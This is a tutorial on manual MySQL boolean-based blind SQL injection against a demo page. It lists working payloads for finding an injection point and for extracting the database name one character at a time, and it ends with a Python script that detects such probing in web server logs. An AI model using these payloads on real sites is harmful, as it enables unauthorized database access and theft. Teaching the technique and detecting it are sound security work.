MySQL blind injection: a detailed walkthrough of manual MySQL boolean-based blind injection
0x00 What is boolean-based blind injection
Boolean
Boolean is a data type in computing that has only two values, True and False. It is also commonly called the logical type.
Blind injection
An injection where the page returns no concrete data is called blind injection; the content of the data is generally inferred from some other observable behaviour of the page.
Boolean-based blind injection
After the page executes the SQL statement it shows only one of two possible results, so the content of the data can be determined by constructing SQL statements that contain logical expressions.
Sounds confusing? No matter, keep reading.
0x01 MySQL syntax introduction
Logical operations
length()
Returns the length of a string.
select length(database());
database() needs no introduction: it returns the name of the current database. length() returns the length of a string; here it is applied to database(), so what is actually returned is the length of 'test' (the name of the current database in this example).
[screenshot: output of select length(database())]
substring()
substring() extracts part of a string; you can specify the start position and the number of characters to extract.
select substring('test',1,3);
select substring('test',2,1);
[screenshot: output of the two substring() queries]
ord()
ord() returns the ASCII code of a single character.
select substring(database(),1,1);
select ord(substring(database(),1,1));
[screenshot: output of the substring() and ord() queries]
Conversely, char() converts an ASCII code into the corresponding character.
select char(116);
[screenshot: output of select char(116)]
0x02 Manual injection
Identifying the injection point
Here we cannot judge from whether the page throws an error, as we would with union-based injection, because both a failed SQL execution and an empty result set return False; the only thing we can go on is the logical value the page reflects back.
/* integer injection */
sql-bool.php?name=user1 and 1=1
sql-bool.php?name=user1 and 1=2
/* string injection (single quotes) */
sql-bool.php?name=user1' and '1'='1
sql-bool.php?name=user1' and '1'='2
/* string injection (double quotes) */
sql-bool.php?name=user1" and "1"="1
sql-bool.php?name=user1" and "1"="2
Whether each payload succeeds or fails tells us whether an injection point exists.
Take integer injection as an example:
If passing user1 returns "exists" (true), then when an integer injection is present, the logical and relation means that appending 1=1 (always true) must also return "exists" (true), while appending 1=2 (always false) must return "does not exist" (false).
In this way we can determine whether boolean-based blind injection is present.
[screenshots: page responses for user1, user1 and 1=1, and user1 and 1=2]
Reading data
Because blind injection has no echo, the only way to recover data is to extract it one character at a time, convert each character to its ASCII code, and compare that code one by one against the ASCII values of printable characters.
Here we use reading the current database name as the example.
/* determine the length of the database name */
sql-bool.php?name=user1' and (select length(database())) = 1 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 2 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 3 and '1'='1
sql-bool.php?name=user1' and (select length(database())) = 4 and '1'='1
Results: false, false, false, true (for lengths 1 to 4 respectively)
When length(database())=4 the page returns true, so the database name is 4 characters long.
Next we determine the characters one position at a time. Since MySQL database names are case-insensitive and are made up of the 26 English letters, digits and underscores, we only need to compare against the ASCII values of those characters.
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 97 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 98 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 99 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 100 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 101 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 102 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 103 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 104 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 105 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 106 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 107 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 108 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 109 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 110 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 111 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 112 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 113 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 114 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 115 and '1'='1
sql-bool.php?name=user1' and (select ord(substring(database(),1,1))) = 116 and '1'='1
Results: false for 97 through 115, true for 116
Comparing against the other ASCII values returns false every time; comparing for equality with 116 returns true, so the ASCII value of the first character of the database name is 116. Converting that ASCII value back to a character tells us the first character of the current database name is 't'.
[screenshot: output of select char(116)]
The remaining characters, and any other data, are read with the same method.
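From the defender's side, the probing walked through above leaves a very recognisable trail in web server access logs: a tautology/contradiction pair appended with and, a length(database()) = N test, and a long run of ord(substring(...)) = N tests from one client. The following Python script is an added example (not part of the original post) that matches those signatures on the URL-decoded query string and counts hits per client IP; the log lines and IP addresses are constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qsl, urlsplit

# Signatures of the boolean-blind probing described above: an always-true /
# always-false pair joined with AND/OR, a length(database()) = N test, and an
# ord(substring(...)) single-character test. Matched on the decoded, lowercased query.
SIGNATURES = {
    "bool_probe": re.compile(r"\b(?:and|or)\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+['\"]?"),
    "length_probe": re.compile(r"\blength\s*\(\s*database\s*\(\s*\)\s*\)[\s)]*=\s*\d+"),
    "char_probe": re.compile(r"\bord\s*\(\s*substring\s*\("),
}

# Combined-format access log line; only the client IP and the request path are needed.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (?P<path>\S+) HTTP/[\d.]+"')

# Constructed sample log (fictional client addresses) replaying the probes from the text.
LOG_LINES = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /sql-bool.php?name=user1 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /sql-bool.php?name=user1%27%20and%20%271%27=%271 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:38 +0000] "GET /sql-bool.php?name=user1%27%20and%20%271%27=%272 HTTP/1.1" 200 311',
    '203.0.113.7 - - [10/Oct/2023:13:55:39 +0000] "GET /sql-bool.php?name=user1%27%20and%20(select%20length(database()))%20=%204%20and%20%271%27=%271 HTTP/1.1" 200 512',
    '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /sql-bool.php?name=user1%27%20and%20(select%20ord(substring(database(),1,1)))%20=%20116%20and%20%271%27=%271 HTTP/1.1" 200 512',
    '198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /sql-bool.php?name=user2 HTTP/1.1" 200 498',
]

def decode_query(path):
    """Return all URL-decoded parameter values of a request path, lowercased and joined."""
    pairs = parse_qsl(urlsplit(path).query, keep_blank_values=True)
    return " ".join(value for _, value in pairs).lower()

def classify(path):
    """Return the set of signature names that match one request path."""
    query = decode_query(path)
    return {name for name, rx in SIGNATURES.items() if rx.search(query)}

def analyze(log_lines, threshold=5):
    """Count signature hits per client IP and return the clients at or above threshold."""
    hits = defaultdict(Counter)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip malformed lines and methods other than GET/POST
        for sig in classify(m.group("path")):
            hits[m.group("ip")][sig] += 1
    return {ip: dict(c) for ip, c in hits.items() if sum(c.values()) >= threshold}

if __name__ == "__main__":
    for ip, counts in analyze(LOG_LINES).items():
        print(f"{ip}: boolean-blind probing suspected, hits by signature: {counts}")
```

A real extraction run produces dozens of char_probe hits per character position from a single client, so a per-client threshold over a short time window separates it cleanly from ordinary traffic.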